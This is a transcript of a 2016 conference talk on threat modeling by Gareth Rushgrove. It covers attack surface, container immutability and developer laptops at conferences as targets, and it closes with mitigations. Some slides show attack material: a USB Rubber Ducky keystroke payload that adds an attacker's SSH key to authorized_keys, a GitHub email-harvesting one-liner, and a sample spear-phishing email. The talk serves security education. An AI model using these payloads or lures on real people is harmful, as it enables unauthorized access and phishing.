Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Thinking Evil Thoughts

Gareth Rushgrove
September 01, 2016

Thinking Evil Thoughts

Talk from Software Circus 2016 on Threat Modeling

Gareth Rushgrove

September 01, 2016
Tweet

More Decks by Gareth Rushgrove

Other Decks in Technology

Transcript

  1. (without introducing more risk)
    Thinking Evil Thoughts
    Puppet
    Gareth Rushgrove
    A taste of threat modeling

    View Slide

  2. (without introducing more risk)
    @garethr

    View Slide

  3. (without introducing more risk)
    Gareth Rushgrove

    View Slide

  4. (without introducing more risk)
    This Talk
    What to expect

    View Slide

  5. - What is threat modeling?
    - Getting the scope right
    - Identifying risks
    - Using conferences to hack people
    Gareth Rushgrove

    View Slide

  6. Introduce some security language
    to help you navigate the domain
    Gareth Rushgrove

    View Slide

  7. Dive straight into examples
    Gareth Rushgrove

    View Slide

  8. Empower you to ask questions
    more than provide easy answers
    Gareth Rushgrove

    View Slide

  9. (without introducing more risk)
    Threat modeling
    A brief introduction

    View Slide

  10. Gareth Rushgrove
    a procedure for optimizing network security
    by identifying objectives and vulnerabilities
    THREAT MODELING

    View Slide

  11. - Determine scope
    - Identify threat agents and attacks
    - Understand existing countermeasures
    - Identify vulnerabilities
    - Prioritise risks
    - Identify countermeasures
    Gareth Rushgrove
    https://www.owasp.org/index.php/Category:Threat_Modeling

    View Slide

  12. Inside each of us, there is the
    seed of both good and evil.
    It's a constant struggle as to
    which one will win.
    Gareth Rushgrove


    Eric Burdon

    View Slide

  13. (without introducing more risk)
    Think evil.

    View Slide

  14. (without introducing more risk)
    Getting the
    scope rights
    Avoiding gaps in your threat model

    View Slide

  15. Ignoring part of your system
    when considering security is
    a common mistake
    Gareth Rushgrove

    View Slide

  16. Gareth Rushgrove
    the attack surface of a software environment
    is the sum of the different points (the "attack
    vectors") where an unauthorized user (the
    "attacker") can try to enter data to or extract
    data from an environment.
    ATTACK SURFACE

    View Slide

  17. (without introducing more risk)
    Example
    What is Production?
    Gareth Rushgrove

    View Slide

  18. LOAD BALANCER
    FRONT END
    BACK END
    DATABASE
    PRODUCTION?

    View Slide

  19. LOAD BALANCER
    FRONT END
    BACK END
    DATABASE
    PRODUCTION?
    PEOPLE
    DESKTOPS
    CI SERVER

    View Slide

  20. LOAD BALANCER
    FRONT END
    BACK END
    DATABASE
    PRODUCTION?
    PEOPLE
    DESKTOPS
    CI SERVER
    HYPERVISOR MANAGEMENT MONITORING

    View Slide

  21. Do you protect your CI stack as
    well as your production database?
    Gareth Rushgrove

    View Slide

  22. Could I execute a query on your
    production database if I
    compromised your CI server?
    Gareth Rushgrove

    View Slide

  23. Example
    Third party services
    Gareth Rushgrove

    View Slide

  24. Gareth Rushgrove
    an entity which facilitates interactions
    between two parties who both trust
    the third party
    TRUSTED THIRD PARTY

    View Slide

  25. Gareth Rushgrove
    a term in computer science and security used
    to describe a boundary where program data or
    execution changes its level of "trust". The
    term refers to any distinct boundary within
    which a system trusts all sub-systems
    (including data).
    TRUST BOUNDARY

    View Slide

  26. Gareth Rushgrove

    View Slide

  27. Why Serverless is a bad name
    Gareth Rushgrove

    View Slide

  28. (without introducing more risk)
    There are still
    servers somewhere
    Gareth Rushgrove

    View Slide

  29. How you think about the servers
    changes, and the respective
    risks and mitigations change.
    But servers still exist.
    Gareth Rushgrove

    View Slide

  30. Why NoOps is a bad name
    Gareth Rushgrove

    View Slide

  31. View Slide

  32. View Slide

  33. How you think about operations
    changes, and the respective
    risks and mitigations change.
    But operations still exist.
    Gareth Rushgrove

    View Slide

  34. Your attack surface is bigger
    than you think
    Gareth Rushgrove

    View Slide

  35. (without introducing more risk)
    Identifying risks
    The need to understand your system

    View Slide

  36. Differences in how you perceive
    a system and how it actually works
    can be used to exploit it
    Gareth Rushgrove

    View Slide

  37. Example
    Immutable infrastructure
    Gareth Rushgrove

    View Slide

  38. Out systems are immutable,
    we don’t need runtime file
    integrity checking
    Gareth Rushgrove


    A possibly naive developer

    View Slide

  39. Gareth Rushgrove
    unchanging over time or unable
    to be changed.
    synonyms: unchangeable, fixed
    IMMUTABLE

    View Slide

  40. (without introducing more risk)
    Containers are not
    immutable by default
    Gareth Rushgrove

    View Slide

  41. (without introducing more risk)
    Containers are not
    immutable by
    default
    Gareth Rushgrove

    View Slide

  42. (without introducing more risk)
    Gareth Rushgrove
    $ docker run -d alpine /bin/sh \
    -c "while true; do echo hello world; sleep 1; done"

    View Slide

  43. (without introducing more risk)
    Gareth Rushgrove
    $ docker exec a7a01beb14de touch /tmp/surprise

    View Slide

  44. (without introducing more risk)
    Gareth Rushgrove
    $ docker diff a7a01beb14de
    C /tmp
    A /tmp/surprise

    View Slide

  45. (without introducing more risk)
    Gareth Rushgrove
    $ docker run --read-only -d alpine /bin/sh \
    -c "while true; do echo hello world; sleep 1; done"

    View Slide

  46. (without introducing more risk)
    Gareth Rushgrove
    $ docker exec 379150b2cf05 touch /tmp/surprise
    touch: cannot touch '/tmp/surprise': Read-only file syste

    View Slide

  47. (without introducing more risk)
    Do your immutable EC2
    instances have read-only
    filesystems?
    Gareth Rushgrove

    View Slide

  48. (without introducing more risk)
    Most Immutable
    Infrastructure isn’t
    Gareth Rushgrove

    View Slide

  49. (without introducing more risk)
    Without technical controls you
    only have social guarantees
    of immutability
    Gareth Rushgrove

    View Slide

  50. (without introducing more risk)
    Hacking
    conferences
    Looking for vulnerabilities

    View Slide

  51. Let’s assume your applications and
    infrastructure are super secure*
    Gareth Rushgrove
    * This probably isn’t true. You should worry about that as well.

    View Slide

  52. - Penetration testing
    - Intrusion detection system
    - Web application firewall
    - Network firewalls
    - Malware scanning
    - Configuration management
    Gareth Rushgrove

    View Slide

  53. Gareth Rushgrove
    How secure is your laptop?

    View Slide

  54. - Hand maintained configuration
    - Updated whenever
    - No central monitoring
    - Administrative access
    - Single factor authentication
    Gareth Rushgrove

    View Slide

  55. Can you push new Docker
    images from your laptop?
    Gareth Rushgrove

    View Slide

  56. Can you create jobs on your
    Jenkins instance from your laptop?
    Gareth Rushgrove

    View Slide

  57. Can you launch new replication
    controllers from your laptop?
    Gareth Rushgrove

    View Slide

  58. Can you release new functions
    to Lambda from your laptop?
    Gareth Rushgrove

    View Slide

  59. Real world threat

    View Slide

  60. (without introducing more risk)
    As a hacker how do
    I own your laptop?
    The fun stuff

    View Slide

  61. Where can I find hundreds of
    developer laptops…
    Gareth Rushgrove

    View Slide

  62. Developer Conferences are a
    Target Rich Environment
    Gareth Rushgrove

    View Slide

  63. Gareth Rushgrove
    More Internet
    Some Internet
    Marks iPhone
    FREE CONFERENCE WIFI
    Hacked Android
    CONFERENCE VENUE
    Private
    Software Circus
    Company next door
    Coffee shop downstairs
    Software Circus II
    Docker Corp
    Avengers Tower
    FON
    My Blackberry
    Nokia4ever
    ABANK

    View Slide

  64. Gareth Rushgrove
    More Internet
    Some Internet
    Marks iPhone
    FREE CONFERENCE WIFI
    Hacked Android
    CONFERENCE VENUE
    Private
    Software Circus
    Company next door
    Coffee shop downstairs
    Software Circus II
    Docker Corp
    Avengers Tower
    FON
    My Blackberry
    Nokia4ever
    ABANK
    This is the official
    conference wifi right?

    View Slide

  65. Gareth Rushgrove
    More Internet
    Some Internet
    Marks iPhone
    FREE CONFERENCE WIFI
    Hacked Android
    CONFERENCE VENUE
    Private
    Software Circus
    Company next door
    Coffee shop downstairs
    Software Circus II
    Docker Corp
    Avengers Tower
    FON
    My Blackberry
    Nokia4ever
    ABANK
    Or is it this one?
    Whatever, both work

    View Slide

  66. Devices exist to man-in-the-middle
    wireless networks
    Gareth Rushgrove

    View Slide

  67. Who has ever picked up a USB
    memory stick at a conference?
    Gareth Rushgrove

    View Slide

  68. Gareth Rushgrove

    View Slide

  69. USB devices exist which will run a
    script on connect (normally by
    impersonating a keyboard)
    Gareth Rushgrove

    View Slide

  70. (without introducing more risk)
    DELAY 1000
    COMMAND SPACE
    DELAY 500
    STRING Terminal
    DELAY 500
    ENTER
    DELAY 800
    STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
    ENTER
    DELAY 1000
    STRING killall Terminal
    ENTER
    Add my public key
    https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29

    View Slide

  71. Local databases

    View Slide

  72. Lots of people here are on Twitter
    and using the conference hashtag
    Gareth Rushgrove

    View Slide

  73. Lots of people here are on GitHub
    with the same username
    Gareth Rushgrove

    View Slide

  74. (without introducing more risk)
    $ curl -s https://api.github.com/users//events/public \
    | jq '.[].payload.commits[0].author.email' \
    | sort \
    | uniq \
    | grep -v "null"
    Email from GitHub user

    View Slide

  75. an e-mail spoofing fraud attempt that targets
    a specific organization or individual, seeking
    unauthorized access to confidential data.
    Gareth Rushgrove
    SPEAR PHISHING

    View Slide

  76. Hi
    Great to see you at last
    week.
    I thought you’d be interested in the container testing
    tool I mentioned. http://nothingevilhere.com. Would
    love to know what you think.
    Hopefully see you at DockerCon next year too.

    View Slide

  77. (without introducing more risk)
    So you’re saying
    we’re all doomed?
    This is quite depressing now I think about it

    View Slide

  78. Part of threat modeling is coming
    up with suitable mitigations to the
    risks identified
    Gareth Rushgrove

    View Slide

  79. - 2 factor authentication
    - Time-limited credentials
    - Separation of duties
    - Two person rule
    - Configuration management
    Gareth Rushgrove

    View Slide

  80. having more than one person required to
    complete a task. In business the separation by
    sharing of more than one individual in one
    single task is an internal control intended to
    prevent fraud and error.
    Gareth Rushgrove
    SEPARATION OF DUTIES

    View Slide

  81. a control mechanism designed to achieve a
    high level of security for especially critical
    material or operations. Under this rule all
    access and actions requires the presence of
    two authorized people at all times.
    Gareth Rushgrove
    TWO-PERSON RULE

    View Slide

  82. Gareth Rushgrove
    a process that identifies critical information to
    determine if friendly actions can be observed
    by enemy intelligence and determines if
    information obtained by adversaries could be
    interpreted to be useful to them.
    OPERATIONAL SECURITY (OPSEC)

    View Slide

  83. Once you understand the threat
    you can seek out specific guidance
    Gareth Rushgrove

    View Slide

  84. View Slide

  85. - Protect data in transit
    - Protect data at rest
    - Authentication
    - Secure boot
    - Platform integrity and sandboxing
    - Application whitelisting
    Gareth Rushgrove
    - Malicious code detection
    - Security policy enforcement
    - External interface protection
    - Device update policy
    - Event collection and analysis
    - Incident response
    https://www.cesg.gov.uk/guidance/end-user-devices-security-principles

    View Slide

  86. Education. Education. Education.
    Gareth Rushgrove

    View Slide

  87. Gareth Rushgrove

    View Slide

  88. (without introducing more risk)
    Conclusions
    If all you remember is…

    View Slide

  89. With Cloud Native approaches
    developers are nearer to
    production than ever before
    Gareth Rushgrove

    View Slide

  90. The efficiency of modern tooling
    introduces new threats, and
    magnifies existing ones
    Gareth Rushgrove

    View Slide

  91. Existing mitigations and security
    controls won’t be enough. You
    need to collaborate with security
    colleagues on new approaches
    Gareth Rushgrove

    View Slide

  92. Threat modeling should be part of
    your development process
    Gareth Rushgrove

    View Slide

  93. Gareth Rushgrove

    View Slide

  94. Elevation of privilege

    View Slide

  95. Gareth Rushgrove

    View Slide

  96. (without introducing more risk)
    Thanks
    And any questions?

    View Slide